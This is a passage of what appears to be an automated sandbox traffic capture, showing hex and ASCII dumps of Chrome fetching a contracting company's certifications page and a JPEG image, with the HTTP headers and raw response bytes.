d2 4a 2e b5 a4 bc 75 75
                                              Data Ascii: J_CgrlzRT1Kd 9Oq#85U-8*oumo%5E9:r n58*Q|Q{{cvr;Ols_[%"T%Mj.er^'[M=WHz{hNl3\/_'5d_QnC5G5x;8uJ.uu
                                              2024-09-27 06:20:03 UTC8000INData Raw: c9 d7 72 f7 32 21 e1 b2 3f d2 02 f7 52 68 69 ae ba ad fb 3d 07 9e af 3b 99 f2 36 aa e6 b1 f8 9c 0d 74 86 64 56 da d7 47 99 d2 f5 3b d4 5f 4e 45 6a ea 26 ac 84 96 a9 a0 38 bc cf e5 ce 2c 8f e2 3c 9e df 81 e6 1b db 8f b9 6f dd 92 dd b4 72 df 99 35 bd 72 fe 73 5f c1 67 c7 67 89 fe 55 9d b0 9b de ce ee c6 ba fb 0a 9c cb 95 e0 f3 4a 3c 9c ca d4 d2 f7 67 f5 a0 fa e2 fa 00 cf 3b 25 e2 63 3b a3 1e 3e 1f a9 d7 a9 a6 ac 8f 8d 51 bf 1f 7c 52 7a 3d 9a 4b a6 2c f3 f9 75 f3 6e 47 1a e9 ca 94 b3 f9 34 66 a4 ec 8e be 7d 4a 2f 55 c7 2e 94 7a 5e 5d 93 cb f2 a8 59 18 13 84 a9 b5 f1 6b 0d 9b 5f 5a 03 6d 70 8a 72 9b 8a 52 96 9c 5a 7f 29 ae 09 45 ad 36 27 37 b3 ac dc b4 e2 96 dd af 79 aa dd 63 57 9b a6 9e 5b d7 4e b5 d8 04 cb cb aa ee 2d 38 56 8f 57 d0 c5 98 d8 f9 11 e2 92 f7
                                              Data Ascii: r2!?Rhi=;6tdVG;_NEj&8,<or5rs_ggUJ<g;%c;>Q|Rz=K,unG4f}J/U.z^]Yk_ZmprRZ)E6'7ycW[N-8VW
                                              2024-09-27 06:20:03 UTC8000INData Raw: 0a 16 5f 27 ef e6 d9 26 fe ad 11 52 46 31 a2 ab 1f e5 61 ce e9 bf af 7b 70 3b 55 e3 d1 57 e9 d7 18 77 2d 0c db d3 f9 c0 e6 d5 8b 9e d2 82 85 78 91 5d 35 f8 df fc c5 8b 6a 9d 78 57 46 cb 1d af 82 5b 5a d3 a3 b0 b6 b7 1a 72 ff 00 75 bb f0 4b d8 07 32 6f 4c 0e 5f 27 d0 e3 af a8 e8 ca 5f b4 d3 af 4c 59 cd bb fd af 09 f5 70 97 ec 7a 64 e3 f6 c4 08 c4 b1 cf 22 e8 bf aa cd d5 49 bb ad 8b 7a e8 d6 9d 85 6c 2f df 72 17 69 62 94 d6 45 cf a1 e9 a0 13 09 37 91 25 a6 ce 11 91 5c a6 a2 a3 d1 24 d9 30 d3 cf 97 71 9c e5 a2 5d e0 4b dc d2 ea 35 e3 7e 8c 7b df b4 d8 f7 3e e3 5e 3a d2 94 9f 5b f6 81 b5 98 c5 ea b6 19 11 1d 8b 40 1a 2d 75 24 88 f4 92 04 80 00 80 1f 59 8a 9a 93 d0 0c c0 00 00 00 00 00 08 24 80 28 66 fe fb 86 fe f4 bd 85 f2 86 77 ef 98 7f 8a 5e c2 f8 02 8f 3c
                                              Data Ascii: _'&RF1a{p;UWw-x]5jxWF[ZruK2oL_'_LYpzd"Izl/ribE7%\$0q]K5~{>^:[@-u$Y$(fw^<
                                              2024-09-27 06:20:03 UTC8000INData Raw: 1d 62 a7 f5 ac 6a 7a 7a 10 fe 0f 99 91 2d 73 f3 25 35 f6 69 d6 b0 2e df cc b0 71 f5 f3 af ae 12 5d 1a ed 28 cf e6 0a e5 e1 c5 c6 ba f9 74 49 47 c1 eb 2c d1 c9 39 75 0b f4 95 8d f4 db e3 7f 49 76 10 84 23 c1 08 a8 c5 74 45 68 80 e3 b9 7c c7 94 b4 e0 ab 16 b9 6e 9a 6d d8 bd 0c 7f db d2 b9 a7 cc 33 2d ca 5f 61 ec 5f 41 d9 27 a0 0a 38 9c a3 96 e1 bf d9 f1 d4 5f 5b db ed 2e a4 a3 bb 62 ea 44 f4 0e 80 1b 37 86 68 bb 37 0e 88 b9 5b 74 22 96 fd 64 8e 5d df 35 f2 c5 e0 c6 72 c9 b3 72 84 22 ff 00 b5 b8 0e d6 cd 74 d4 9e 9d 19 e7 df 32 f9 8b 2d 7e cb 81 f0 a9 ee b6 d6 a5 f4 10 f9 47 3c cb d3 f8 8f 30 8c 61 f6 29 8b 84 b4 ef 03 b3 91 9d 87 8b fb cd f0 ab f1 34 8e 6d df 34 f2 d8 4b 83 1e 33 cc 97 f9 11 e3 23 1f e5 7e 51 5c b8 a7 e6 64 4b fc e9 b9 ff 00 68 e9 d1 87 8f
                                              Data Ascii: bjzz-s%5i.q](tIG,9uIv#tEh|nm3-_a_A'8_[.bD7h7[t"d]5rr"t2-~G<0a)4m4K3#~Q\dKh
                                              2024-09-27 06:20:03 UTC8000INData Raw: 96 1d 75 ce 4a 6b 8b 8d b5 c3 1e 97 b0 e8 db 52 b1 29 27 a4 e3 b6 2f b4 e6 ac bb a7 e6 61 66 fe 5d c9 f8 2c 5b 23 38 f5 ea 05 dc 77 63 ae 3a 49 4f 67 8b 5e 87 d3 a7 61 a6 5c b6 97 0b a3 53 95 72 bd 69 29 47 7a d4 ad 91 4e 5e 0d 7e 76 0a 73 94 b6 49 4b 6a 66 78 fc f6 85 3f 86 c9 d6 39 7a 6d 8c 53 6a 5d cd 01 5e ef 97 e9 f2 68 84 ad 94 a7 4c bc 11 6f 64 df 49 b9 55 18 dd 97 45 69 46 a8 54 d2 4b 72 6d 1b b2 73 b1 f0 aa 79 d9 cf 82 2b dc 86 f7 de 91 4b 0f 36 bc ec 4c dc ba 75 e1 ba 49 24 d6 8d 2d 34 03 6f 25 aa b8 50 b0 ef 8a 9d f5 eb 64 78 97 44 ba 51 75 60 61 ab d5 de 5a 85 c9 38 a6 ba 99 a2 78 d9 33 58 b9 38 cd 29 d5 14 a7 17 f5 d6 9d 66 c8 67 3f 3a 74 df 5b 8c a3 b5 49 2d 50 17 92 8c 56 c5 b8 c6 37 57 39 4a 11 92 72 86 c6 56 59 38 ea b9 5b 05 29 47 73 df
                                              Data Ascii: uJkR)'/af],[#8wc:IOg^a\Sri)GzN^~vsIKjfx?9zmSj]^hLodIUEiFTKrmsy+K6LuI$-4o%PdxDQu`aZ8x3X8)fg?:t[I-PV7W9JrVY8[)Gs
                                              2024-09-27 06:20:03 UTC8000INData Raw: 74 7f 4e 4f 4a 9f 60 1d 32 48 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 04 90 00 00 00 00 00 00 00 00 00 00 00 12 00 80 00 00 09 02 01 24 00 00 00 00 00 00 01 20 80 04 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 68 be ab 1e ae 97 c2 e5 ef 33 7b 23 b4 0d 55 d9 17 18 a9 3f 12 7a 2e b6 d1 a7 32 bb 97 0d b8 da 2b 13 5c 4b ae 3d 24 e4 62 ca 76 c2 50 f7 53 d7 ab 47 d6 25 97 3a f4 5c 3c 4d 3e 1b 1e e6 bb 74 e9 03 75 77 57 6b e1 52 4e 49 78 97 4a 66 cd 8f f9 8e 7d be 4a 4d e2 cd 46 eb 1e fe 89 3e ad 4c a7 fc 45 4e af 2d a9 42 2b f3 65 a6 9c 4f b8 0b db 37 f5 74 9c be
                                              Data Ascii: tNOJ`2H$$ h3{#U?z.2+\K=$bvPSG%:\<M>tuwWkRNIxJf}JMF>LEN-B+eO7t
                                              2024-09-27 06:20:03 UTC8000INData Raw: 7d 5b 00 bf dc f7 6f 5d 04 2d ef 7f a4 a3 9b 39 ba 54 2d 4e 32 4f 57 c3 f5 97 a0 ca 2b 3a ae 19 57 a5 f5 34 b4 83 f0 b8 fa 40 db 5e 76 25 b6 4a a8 db 17 38 cb 4e 1e 95 22 ad b9 79 f5 73 09 56 ab 8c f1 9a 4e 29 7b ef af 42 ae b4 f9 d7 c7 2a b8 c3 1d f8 e7 28 bd 26 a7 d4 b4 da 61 8f 2c 78 ca 59 33 9c aa 86 22 7c 11 93 6e 52 52 dd bc 09 e6 53 c7 c8 c9 c6 be 53 9d 52 e2 e0 94 56 c7 0e d6 6f a6 ac e9 73 0a eb c9 8f 1d 14 46 4e 37 f5 f1 6e 2c ac bc 7c 8c 58 5f 08 29 4a d5 b2 2d 2d 76 f5 f5 12 bc da dc 31 54 9c b8 f5 71 96 fd 9d 29 b0 26 ab 14 61 91 1a 9b b2 71 d5 ea fa 4a 5c 93 94 df 4e 2d 9f c4 25 e6 d9 6c dc d4 5e e8 ad 76 17 66 d6 3d 91 72 5c 35 ee 4d 6f 94 86 5d d2 72 84 61 2d 22 9a 76 3f 62 02 d3 94 2b 8a 4d f0 a5 b1 18 5a f8 e4 aa 4f de da fb 8d 36 c6 56
                                              Data Ascii: }[o]-9T-N2OW+:W4@^v%J8N"ysVN){B*(&a,xY3"|nRRSSRVosFN7n,|X_)J--v1Tq)&aqJ\N-%l^vf=r\5Mo]ra-"v?b+MZO6V
                                              2024-09-27 06:20:03 UTC8000INData Raw: 6d b6 ab 2e 8c 78 63 18 c5 3d 78 65 bc c2 35 5b 3a a3 64 ed 6e 2d 71 6b d4 99 ae ba a3 38 b9 3d 52 52 d2 2d b6 b8 d7 58 19 55 8f 93 4d f6 49 db 15 4c 96 90 ad 74 19 eb 5c 61 e5 bb 78 5e 9b 5b f7 8d 11 78 52 8c fc 9e 29 f0 3d 14 35 7a f1 33 28 46 b5 6a 84 e2 a2 a3 1f 1b de f8 be ca 03 28 4b 0e a8 70 2b db 4b a3 a0 c9 df 8f ae c7 29 6c dc b7 1a b1 fc eb 72 27 6a 5a 53 ba 34 ca 3a 6e e9 d4 bb 1a 92 fa aa 31 5d 1f f1 02 b2 be a4 b4 86 3c dc 7b 3a 4c 67 74 1c 54 a5 8a f4 5b b5 5b 62 5d 94 a8 8f bd 28 c7 d3 a1 aa eb b0 67 5c aa b6 ea f8 65 b1 ae 34 bf 94 0d 0a ec b7 14 e1 08 c5 fd 55 a6 f4 25 6f 31 51 6f 8a a4 a2 b5 72 db b0 c3 27 99 61 63 d0 e1 1b e0 9a 5a 41 41 a9 bd 0a 96 73 5e 5f 6e 32 84 ec 97 93 a7 e6 f0 af 14 a5 d4 06 da f2 6f ca ae 76 55 76 b0 af 64 a3
                                              Data Ascii: m.xc=xe5[:dn-qk8=RR-XUMILt\ax^[xR)=5z3(Fj(Kp+K)lr'jZS4:n1]<{:LgtT[[b](g\e4U%o1Qor'acZAAs^_n2ovUvd


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.465394173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:07 UTC721OUTGET /certifications HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:07 UTC389INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:07 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Access-Control-Allow-Credentials: true
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-09-27 06:20:07 UTC7803INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 62 61 73 69 63 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 69 74 79 20 44 69 61 6d 6f 6e 64 20 43 6f 6e 74 72 61 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76
                                              Data Ascii: 2000<!DOCTYPE HTML><html lang="en"><head> ...=============== basic ===============--> <meta charset="UTF-8"> <title>City Diamond Contracting</title> <meta name="viewport" content="width=dev
                                              2024-09-27 06:20:07 UTC395INData Raw: 32 42 45 59 48 62 75 38 68 77 4b 59 65 79 37 2b 62 79 72 62 38 6c 56 6f 58 39 34 47 4a 35 76 38 7a 52 41 47 41 69 4c 68 30 41 37 43 6b 35 32 73 30 41 76 74 67 54 36 4d 68 44 51 59 75 38 6c 6a 2b 56 38 42 68 4e 66 79 38 6a 2f 33 2f 43 67 41 79 52 41 47 41 69 4c 68 79 50 4c 42 54 51 74 65 35 4b 33 52 6a 67 61 75 41 58 68 37 4c 50 78 6a 34 74 6f 61 66 64 37 30 41 38 42 73 71 33 34 55 67 45 56 4d 41 49 43 49 75 72 41 65 63 6e 38 42 31 4c 73 57 4f 39 67 31 74 58 32 7a 39 67 53 39 58 59 79 63 6d 56 71 73 50 73 49 62 6a 4f 6a 32 4a 6a 76 2f 4e 46 41 55 41 49 6c 4b 72 42 59 44 62 67 59 36 65 72 33 4d 6e 34 55 37 32 4b 7a 55 51 76 30 48 49 52 39 67 6f 52 79 30 32 78 6b 35 65 64 45 6e 44 2f 78 6d 6a 41 45 42 45 61 6c 45 50 33 49 7a 4e 68 2f 76 30 4c 50 42 4c 34 6e
                                              Data Ascii: 2BEYHbu8hwKYey7+byrb8lVoX94GJ5v8zRAGAiLh0A7Ck52s0AvtgT6MhDQYu8lj+V8BhNfy8j/3/CgAyRAGAiLhyPLBTQte5K3RjgauAXh7LPxj4toafd70A8Bsq34UgEVMAICIurAecn8B1LsWO9g1tX2z9gS9XYycmVqsPsIbjOj2Jjv/NFAUAIlKrBYDbgY6er3Mn4U72KzUQv0HIR9goRy02xk5edEnD/xmjAEBEalEP3IzNh/v0LPBL4n
                                              2024-09-27 06:20:07 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:07 UTC8192INData Raw: 32 30 30 30 0d 0a 48 37 47 54 49 54 65 39 71 4f 35 63 6e 7a 7a 39 68 36 42 78 39 2b 77 72 59 32 75 6b 69 79 6f 2b 31 2f 55 68 59 46 41 43 4a 53 71 51 37 41 50 34 45 42 6e 71 39 7a 41 76 42 79 36 4d 59 57 62 49 32 64 78 4f 66 4c 36 63 44 62 6a 73 70 79 50 66 7a 66 67 49 37 2f 7a 53 51 46 41 43 4a 53 71 54 38 41 47 33 71 2b 78 75 33 41 58 30 49 33 74 4b 41 72 66 6f 66 2b 58 77 59 75 63 56 52 57 48 65 34 7a 45 37 35 47 48 46 4d 77 34 70 67 43 41 42 47 70 78 48 62 41 53 5a 36 76 4d 51 5a 4c 67 68 4f 4c 6b 34 47 6c 50 4a 55 39 71 39 44 57 42 6b 66 6c 72 51 72 4d 37 37 69 4f 4f 76 30 76 6f 78 51 41 69 45 69 35 42 67 4d 33 59 6b 2b 5a 76 6b 7a 44 6a 76 59 4e 65 62 70 66 71 61 57 41 33 33 6f 73 2f 33 7a 67 4c 59 66 6c 61 66 75 66 6c 45 30 42 67 49 69 55 36 79 72
                                              Data Ascii: 2000H7GTITe9qO5cnzz9h6Bx9+wrY2ukiyo+1/UhYFACJSqQ7AP4EBnq9zAvBy6MYWbI2dxOfL6cDbjspyPfzfgI7/zSQFACJSqT8AG3q+xu3AX0I3tKArfof+XwYucVRWHe4zE75GHFMw4pgCABGpxHbASZ6vMQZLghOLk4GlPJU9q9DWBkflrQrM77iOOv0voxQAiEi5BgM3Yk+ZvkzDjvYNebpfqaWA33os/3zgLYflafuflE0BgIiU6yr
                                              2024-09-27 06:20:07 UTC6INData Raw: 32 57 50 51 30 37
                                              Data Ascii: 2WPQ07
                                              2024-09-27 06:20:07 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:07 UTC8192INData Raw: 32 30 30 30 0d 0a 39 45 52 67 47 41 69 42 2b 78 72 67 4d 34 6c 62 62 33 74 72 73 65 2f 70 2b 46 4c 58 78 4c 67 77 75 42 68 54 79 56 66 54 59 77 4a 33 51 44 52 55 6f 70 41 42 44 78 49 37 5a 31 41 50 38 46 64 67 62 4f 61 2b 66 37 58 43 38 41 66 42 4f 59 45 62 72 78 5a 64 67 49 4f 4e 68 54 32 57 38 44 64 34 52 75 6f 45 68 7a 48 55 4e 58 51 43 53 6a 51 6f 38 41 66 41 65 38 6a 77 30 39 33 77 48 38 75 38 79 66 63 7a 30 43 6b 49 62 68 2f 36 37 41 31 66 67 37 75 76 6c 73 6f 43 46 30 49 30 57 61 55 77 41 67 34 73 64 59 4c 4e 76 62 67 67 37 4c 2f 41 46 59 47 50 6a 52 55 35 31 37 41 38 73 36 4c 6a 4d 4e 41 63 41 35 77 42 42 50 5a 62 2b 42 44 76 32 52 53 47 6b 4b 51 4d 53 66 70 78 32 58 31 77 76 34 70 63 66 36 72 6f 6e 37 70 2b 44 59 74 77 44 75 43 42 7a 76 73 66 77
                                              Data Ascii: 20009ERgGAiB+xrgM4lbb3trse/p+FLXxLgwuBhTyVfTYwJ3QDRUopABDxI7Z1AP8FdgbOa+f7XC8AfBOYEbrxZdgIONhT2W8Dd4RuoEhzHUNXQCSjQo8AfAe8jw093wH8u8yfcz0CkIbh/67A1fg7uvlsoCF0I0WaUwAg4sdYLNvbgg7L/AFYGPjRU517A8s6LjMNAcA5wBBPZb+BDv2RSGkKQMSfpx2X1wv4pcf6ron7p+DYtwDuCBzvsfw
                                              2024-09-27 06:20:07 UTC6INData Raw: 48 4a 6d 37 43 76
                                              Data Ascii: HJm7Cv
                                              2024-09-27 06:20:07 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:07 UTC8192INData Raw: 32 30 30 30 0d 0a 59 6b 74 6a 64 2b 35 34 71 7a 61 44 49 57 42 4a 78 50 5a 56 73 4a 4f 77 49 6a 69 58 2f 36 71 6a 58 50 59 35 6b 34 4b 33 6b 50 39 4d 4b 47 2b 59 38 6b 6a 6b 51 30 61 54 49 4a 57 34 74 79 44 65 6c 5a 4c 2b 44 54 30 56 67 41 57 6d 34 57 7a 50 48 59 56 4e 56 39 6f 53 75 65 6c 4c 77 46 41 47 41 66 4b 69 64 68 54 78 62 6c 37 67 32 65 67 63 33 48 66 34 37 74 70 53 36 2b 50 69 2f 35 6d 6f 62 6b 48 70 58 71 67 33 58 34 42 32 46 44 59 6c 4b 62 38 63 41 78 32 48 61 2f 63 69 32 4d 4a 58 56 4b 32 31 50 77 4e 39 68 68 4b 6c 39 55 38 44 4f 37 59 57 6d 71 38 35 43 33 77 37 66 2f 59 4b 4d 43 74 32 4b 5a 43 76 4e 71 55 2b 41 4d 59 41 4e 61 44 77 51 61 73 50 55 70 70 2b 49 76 31 30 65 55 38 68 67 41 46 41 33 43 39 72 49 75 56 50 4a 71 59 4f 36 4f 76 66 6a
                                              Data Ascii: 2000Yktjd+54qzaDIWBJxPZVsJOwIjiX/6qjXPY5k4K3kP9MKG+Y8kjkQ0aTIJW4tyDelZL+DT0VgAWm4WzPHYVNV9oSuelLwFAGAfKidhTxbl7g2egc3Hf47tpS6+Pi/5mobkHpXqg3X4B2FDYlKb8cAx2Ha/ci2MJXVK21PwN9hhKl9U8DO7YWmq85C3w7f/YKMCt2KZCvNqU+AMYANaDwQasPUpp+Iv10eU8hgAFA3C9rIuVPJqYO6Ovfj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.465395173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:07 UTC734OUTGET /uploads/certifications/1/c3477d31049b9b96e47ca0d2bf05bcdb.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:08 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:07 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:38:52 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45980
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:08 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:08 UTC8000INData Raw: cb 7f f0 dc 5f 88 74 d9 b0 e7 bd b1 cd bb ca 6b 5d b4 f3 7e 1b f8 3f 4f d5 75 fd 47 4b 93 77 a7 8a f6 d4 b5 e6 b5 40 fb bd c3 c5 41 be 1f 86 fc 63 a7 e9 f1 fe 25 8b 06 72 63 d3 c3 14 20 65 7a ed 02 55 af d0 ed f8 0c 44 3f 12 94 7a 19 4e 5d 20 07 71 95 d7 1a 7f ce e3 bd 20 7d 99 20 72 97 e2 ff 00 f2 e3 13 fc 4b ac 3d 36 2d 47 4f 8a 59 25 ef e4 fd d4 1e f8 7e 31 21 f8 30 ea 60 7f 9b 10 31 5f 84 af 6d fd 1a a0 7d 19 c9 10 76 92 01 f0 b4 99 01 c9 7e 4b f0 bf fc b6 f0 75 bd 34 7a 9e aa 53 96 5c a3 76 ed dc 78 7b cf 7d 5d 3f 13 ff 00 cb 7f 0e 1e 92 79 e7 29 4f 2e 2c 74 25 74 0e de 2c 7f 9a 07 d4 6e 1e 21 77 0f 10 fc a7 fe 5b df 82 74 dd 46 08 75 73 dd ea 5c c6 92 d3 bc 7e a7 93 f0 af c3 30 1f c5 72 e0 20 ec c2 77 63 f3 77 89 8d 7b d0 3e de c5 d5 ea b6 38 ee fe
                                              Data Ascii: _tk]~?OuGKw@Ac%rc ezUD?zN] q } rK=6-GOY%~1!0`1_m}v~Ku4zS\vx{}]?y)O.,t%t,n!w[tFus\~0r wcw{>8
                                              2024-09-27 06:20:08 UTC8000INData Raw: 90 e9 71 66 ea 4f 55 2e aa 10 03 70 af 87 e9 f1 fd 1e 3f c6 61 38 fe 23 87 37 a3 2c b8 e1 11 ba 31 8e eb e7 4f 07 5c f9 e3 d5 74 5d 4e 3c 3d 34 f0 9d a3 43 0a dd af b0 6b 48 a6 bf fa f3 74 d7 0b 86 41 09 fd b2 34 1f 9d 77 a7 d2 e9 ff 00 14 c7 93 aa 9f 42 63 28 e4 c7 1b b9 55 48 69 c7 d2 fc f7 e2 3d 36 59 7e 15 d2 40 42 46 51 22 e2 22 6c 73 d9 e9 ff 00 cb 83 a6 cf 83 36 2e b3 a5 89 94 cc 25 8a 62 31 27 b7 b3 d8 4f d0 10 0f 5b f8 b6 0e b3 a3 c9 90 7a b8 f1 c2 71 86 fc 75 ba 47 5e 35 e3 c7 e4 fa 19 3f 1d e9 fa 03 8b a7 c8 26 77 63 8c c4 ea fb 69 7d f7 1a ec f9 3d 6f e1 d3 c1 f8 2c 7a 7c 71 32 c9 70 9c a3 11 66 cf 3f 47 0e f2 e9 f2 ff 00 d6 7d 1c f6 4b 6c 70 c4 4a 5b 4d 03 52 e4 f6 60 3b b3 ff 00 e5 c3 80 63 c6 44 32 4b 26 5d 61 88 0f 3e 86 b5 6b a4 fc 77 06
                                              Data Ascii: qfOU.p?a8#7,1O\t]N<=4CkHtA4wBc(UHi=6Y~@BFQ""ls6.%b1'O[zquG^5?&wci}=o,z|q2pf?G}KlpJ[MR`;cD2K&]a>kw
                                              2024-09-27 06:20:08 UTC8000INData Raw: 6e 5c ce 20 78 d1 ce 13 31 f7 3b c6 62 5c 20 4c 71 80 d9 34 c4 b2 08 fb 4b 91 26 66 90 2e 59 7f 85 98 c0 cb 53 c3 70 c5 5a 9e 5d 50 26 31 11 d0 34 aa c0 2a aa 80 bc f9 3e 22 f4 3c f9 47 99 a8 0e 3d 2e 5e 01 65 a0 11 f9 96 a0 3c be f2 e7 23 64 94 00 05 9a 6f 21 af 28 e0 26 1e 51 b8 fc 9c d1 0a 80 b2 13 3c 86 5c 70 b1 d2 26 5e 3a 22 31 dc 69 01 84 6f 53 c2 77 6f 90 03 85 9c be c8 e0 27 08 d6 d0 37 55 56 14 55 50 50 0b 12 1d d4 8b d4 15 a3 e3 f4 a0 3b 88 e5 b6 40 d3 56 90 15 55 40 55 55 01 55 54 05 55 50 15 55 40 55 55 01 45 da 5e 7e 92 7e a6 3d fe 26 5f 5a 07 42 aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 03 86 62 0d 36 a8 12 74 1a 24 30 0d 9b 6a cf 64 0a 54 03 69 40 cf 24 6c 68 e1 c3 d6 f3 e4 8e d3 ec 6a 01 3f cc 17 f6 91 0f 30 31 3f 26
                                              Data Ascii: n\ x1;b\ Lq4K&f.YSpZ]P&14*>"<G=.^e<#do!(&Q<\p&^:"1ioSwo'7UVUPP;@VU@UUUTUPU@UUE^~~=&_ZB**b6t$0jdTi@$lhj?01?&
                                              2024-09-27 06:20:08 UTC8000INData Raw: e8 46 39 c6 73 c8 65 30 45 13 43 48 89 00 34 fe a2 4a 06 b3 eb 70 c2 52 8c a6 01 86 b2 d0 e9 df 53 c7 1d b9 5c bd 77 4f 84 91 39 d1 b2 0e 87 b0 04 fd 00 87 2c ff 00 86 47 3e 49 4e 52 20 48 18 d0 a1 c8 ae 7b 8e e0 1b a2 b8 ba 28 47 21 39 27 be 72 12 dc 0d 6a 24 22 38 1d bc a8 1b 64 eb b0 62 24 4e 40 10 68 fb 38 3f 46 a2 cf 01 c8 fe 23 01 93 65 69 75 b8 1d 3e d7 fd 97 09 fe 13 8a 30 80 94 cf 96 e2 67 3d a7 70 99 f6 e9 7c 00 5a 3f 87 e2 91 b1 90 8d e4 98 ed 23 fc 47 4f f9 47 e8 40 da 5f 8a 74 d1 1b 8c eb 52 38 37 a0 be 2a f8 d7 dc d9 fc 43 a7 12 31 33 16 06 e3 f5 f3 c7 07 8e 5e 7c 5f 84 c7 1d 9d e6 ce ee 00 03 58 88 fe 97 ef 53 f8 4c 4c 65 88 ce 5e 9c b9 86 9f 16 9a f1 ec ba e2 d0 3a e3 